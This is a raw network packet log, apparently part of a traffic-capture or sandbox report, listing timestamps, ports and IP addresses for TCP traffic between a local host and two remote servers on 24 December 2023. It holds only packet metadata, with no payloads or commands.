Dec 24, 2023 10:44:28.761605024 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761651039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761672020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761710882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761729002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761768103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761823893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761862040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761879921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.761915922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.761986017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762023926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762192965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762228966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762274981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762329102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762347937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762382984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762471914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762509108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762527943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762554884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762563944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762589931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762638092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762665033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762674093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762698889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762732983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762769938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762846947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762883902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762913942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.762955904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.762984037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763012886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763021946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763047934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763076067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763114929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763133049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763159037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763166904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763191938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763240099 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763276100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763294935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763319969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763334036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763353109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763469934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763508081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763535976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763576984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763593912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763621092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763631105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763659000 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763678074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763716936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763736963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763776064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763798952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763840914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763856888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763894081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.763923883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.763961077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764009953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764048100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764065027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764101982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764275074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764307976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764317989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764358044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764373064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764399052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764411926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764457941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764476061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764516115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764533043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764547110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764566898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764589071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764610052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764647961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764677048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764694929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764728069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764740944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764799118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764837980 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764854908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764884949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764908075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.764945030 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.764974117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765013933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765032053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765068054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765126944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765162945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765234947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765270948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765289068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765327930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765346050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765386105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765402079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765434027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765444040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765469074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765499115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765513897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765537977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765552998 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765644073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765686989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765717030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765752077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765810013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.765845060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.765988111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766021967 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766083956 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766119003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766175985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766211987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766258001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766293049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766321898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766361952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766391993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766427040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766457081 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766493082 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766521931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766560078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766578913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766617060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766630888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766674995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766693115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766732931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766751051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766765118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766783953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766805887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766823053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766853094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766866922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766890049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766926050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.766964912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.766994953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767045975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767062902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767103910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767122030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767159939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767178059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767191887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767214060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767230034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767255068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767294884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767313957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767354012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767429113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767465115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767484903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767525911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767539978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767554998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767580032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767596006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767621994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767663002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767680883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767719030 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767736912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767776966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767795086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767832041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767841101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767868996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767877102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767910004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767919064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767946959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.767956018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.767981052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768032074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768069983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768085003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768114090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768132925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768172026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768189907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768220901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768230915 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768254042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768266916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768302917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768369913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768410921 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768440008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768486023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768516064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768552065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768604040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768640995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768659115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768672943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768693924 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768708944 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768738031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768774986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768804073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768845081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768862009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768898964 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.768918037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.768955946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769059896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769098997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769128084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769171953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769192934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769229889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769249916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769285917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769345045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769382954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769402981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769438982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769474030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769514084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769531965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769576073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769593000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769620895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769634962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769659042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769671917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769704103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769712925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769736052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769788980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769828081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769856930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.769896984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.769974947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770010948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770040989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770082951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770111084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770152092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770169020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770195007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770207882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770229101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770241976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770278931 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770294905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770333052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770350933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770390987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770406008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770443916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770462036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770487070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770509005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770523071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770585060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770621061 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770642042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770684004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.770701885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.770737886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793231964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793246984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793306112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793324947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793365955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793425083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793476105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793534040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793576002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793596983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793637037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793665886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793704987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793740988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793778896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793807030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793834925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.793852091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.793874979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.794007063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.794045925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.794150114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.794193983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.794214010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.794251919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.794271946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.794312000 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.794478893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.794519901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.800894976 CET	443	49719	192.36.38.33	192.168.2.5
Dec 24, 2023 10:44:28.800987959 CET	49719	443	192.168.2.5	192.36.38.33
Dec 24, 2023 10:44:28.805016994 CET	49719	443	192.168.2.5	192.36.38.33
Dec 24, 2023 10:44:28.805032015 CET	443	49719	192.36.38.33	192.168.2.5
Dec 24, 2023 10:44:28.805294037 CET	443	49719	192.36.38.33	192.168.2.5
Dec 24, 2023 10:44:28.805614948 CET	49719	443	192.168.2.5	192.36.38.33
Dec 24, 2023 10:44:28.848747969 CET	443	49719	192.36.38.33	192.168.2.5
Dec 24, 2023 10:44:28.894942999 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.895004034 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.895026922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.895081997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.895165920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.895210028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002568960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002612114 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002621889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002671003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002698898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002723932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002734900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002757072 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002835989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002876997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002891064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002929926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.002949953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.002990007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:29.003004074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:29.003053904 CET	49716	80	192.168.2.5	91.215.85.17
